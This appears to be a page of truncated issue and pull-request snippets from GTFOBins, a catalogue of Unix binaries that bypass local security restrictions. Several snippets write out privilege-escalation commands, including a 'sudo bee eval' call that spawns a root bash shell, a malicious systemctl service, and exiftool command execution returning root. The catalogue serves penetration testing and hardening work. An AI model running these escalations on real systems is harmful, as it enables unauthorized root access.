GTFOBins.github.io
GTFOBins.github.io copied to clipboard
GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Ref. https://juggernaut-sec.com/fail2ban-lpe/#Putting_the_Pieces_Together_and_Getting_a_Root_Shell PS: Maybe formatting could be improved, for example to add blank lines between cat blocks.
Bee sudo function added, project details below: - https://backdropcms.org/project/bee - https://github.com/backdrop-contrib/bee Example: ```terminal terp@dev:/var/www/html$ whoami terp terp@dev:/var/www/html$ sudo bee eval "system('/bin/bash');" root@dev:/var/www/html# whoami root ```
After the malicious service has been linked, it is started using `--now` during enabling (./systemctl enable --now $TF). However, in some cases, --now does not immediately start the service, requiring...
BBOT is a recursive, modular OSINT framework written in Python. It can execute the entire OSINT process in a single command: subdomain enumeration, port scans, web screenshots, vulnerability scanning, and...
https://github.com/foundry-rs/foundry Foundry is a blazing fast, portable and modular toolkit for Ethereum application development written in Rust. ```text --- functions: command: - code: | COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF...
Run system command: ``` $ COMMAND=id $ INPUT=sample.pdf $ exiftool -if "system('$COMMAND');1" --filename INPUT uid=0(root) gid=0(root) groups=0(root) ExifTool Version Number : 12.76 ``` Run system command and exfiltrate result via...
[As described in POSIX](https://pubs.opengroup.org/onlinepubs/9699919799.2018edition/utilities/sort.html), `sort` has a flag that can be used to write to files: ``` -o output Specify the name of an output file to be used instead...
Hi Setting environment variable in sudo requires permissions for preserve the environment also (env_check, or env_keep options). So without this permissions escalation via variable fails. However, environment variable isn't needed...
